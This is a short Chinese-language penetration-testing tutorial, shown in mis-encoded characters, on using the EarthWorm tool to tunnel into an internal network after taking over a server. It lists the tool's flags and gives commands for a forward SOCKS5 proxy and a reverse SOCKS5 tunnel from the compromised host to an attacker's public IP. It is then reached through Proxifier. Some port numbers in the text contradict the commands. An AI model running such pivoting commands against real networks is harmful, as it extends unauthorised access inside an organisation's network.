ew端口轉(zhuǎn)發(fā)
前言
當(dāng)我們在內(nèi)網(wǎng)滲透中,并拿下了內(nèi)網(wǎng)一臺(tái)服務(wù)器權(quán)限時(shí),自以為內(nèi)網(wǎng)滲透已經(jīng)算一次完整滲透了?
咦.....其實(shí)并不是。內(nèi)網(wǎng)漫游的滲透是不完整的
本文使用的是一款內(nèi)網(wǎng)穿透神器:EarthWorm。

0x01 ew介紹
這里EarthWorm簡稱?EW?是一套輕量便攜且功能強(qiáng)大的網(wǎng)絡(luò)穿透工具,基于標(biāo)準(zhǔn)C開發(fā),具有sAocks5代理、端口轉(zhuǎn)發(fā)和端口映射三大功能
不會(huì)用咋辦?:媽的看官方文檔
下載地址:https://github.com/idlefire/ew

1.可穿透復(fù)雜的內(nèi)網(wǎng)環(huán)境。(這么說吧:我本地連著路由器開一個(gè)虛擬機(jī),可以直接反彈到公網(wǎng)的
云服務(wù)器上。)
2.以支持多平臺(tái)間的轉(zhuǎn)接通訊,Linux、Windows、MacOS、Arm‐Linux均支持。
支持平臺(tái)列表:(可跨平臺(tái)反彈)
ew_for_Win.exe 適用各種Windows系統(tǒng)(X86指令集、X64指令集) Windows7、Windows XPew_for_Linux32???各常見Linux發(fā)行版(X86指令集??CPU)?????????Ubuntu(X86)/BT5(X86)ew_for_linux64????各常見Linux發(fā)行版(X64指令集??CPU)????????Ubuntu(X64)/kali(X64)ew_for_MacOSX64????MacOS系統(tǒng)發(fā)行版??(X64指令集)????????????蘋果PC電腦,蘋果serverew_for_Arm32??????常見Arm-Linux系統(tǒng)?????????????????????????HTC??New??One(Arm-Android)/小米路由器(R1D)ew_mipsel?????????常見Mips-Linux系統(tǒng)??(Mipipsel指令集?CPU)?螢石硬盤錄像機(jī)、小米mini路由器(R1CM)
幫助文檔:
nsocks類似通過Socks5代理后的netcat,可用來測試socks serverssocksd用來開啟Socks5代理服務(wù)ssocks本地啟用Socks5服務(wù),并反彈到另一IP地址rcsocks接收反彈過來的Socks5服務(wù),并轉(zhuǎn)向另一端口‐l listenport為服務(wù)啟動(dòng)打開一個(gè)端口。‐d refhost設(shè)置反射主機(jī)地址。‐e refport設(shè)置反射端口。‐f connhost設(shè)置連接主機(jī)地址。‐g connport設(shè)置連接端口。‐h通過添加‐s參數(shù)來顯示幫助文本,您還可以看到更詳細(xì)的幫助。‐a關(guān)于顯示“關(guān)于”頁面‐v版本顯示版本。
0x02 ?使用方法
該工具共有 6 種命令格式,幫助文檔寫了常用的3種(ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran)
1、開啟正向SOCKS v5服務(wù)器
ew_for_Win.exe ‐s ssocksd ‐l 1080
2、反彈 SOCKS v5 ?服務(wù)器
操作具體分兩步:
?
a?先在一臺(tái)具有公網(wǎng) ip 的主機(jī)A上運(yùn)行以下命令?假設(shè)這里公網(wǎng)ip為:
47.104.70.161?
ew_for_Win.exe ‐s rcsocks ‐l 1080 ‐e 9999
?
b?在目標(biāo)主機(jī)B上啟動(dòng) SOCKS v5 服務(wù) 并反彈到公網(wǎng)主機(jī)的 8888端口
ew_for_Win.exe ‐s rssocks ‐d 47.104.70.161 ‐e 9999
攻擊機(jī)器會(huì)彈 成功

此時(shí)一個(gè)Socks5連接工具就可以連接到本地1008端口來代理訪問了,這里我使用Proxifier進(jìn)行代理

在代理處配置127.0.0.1:1080,測試代理已連接。

完
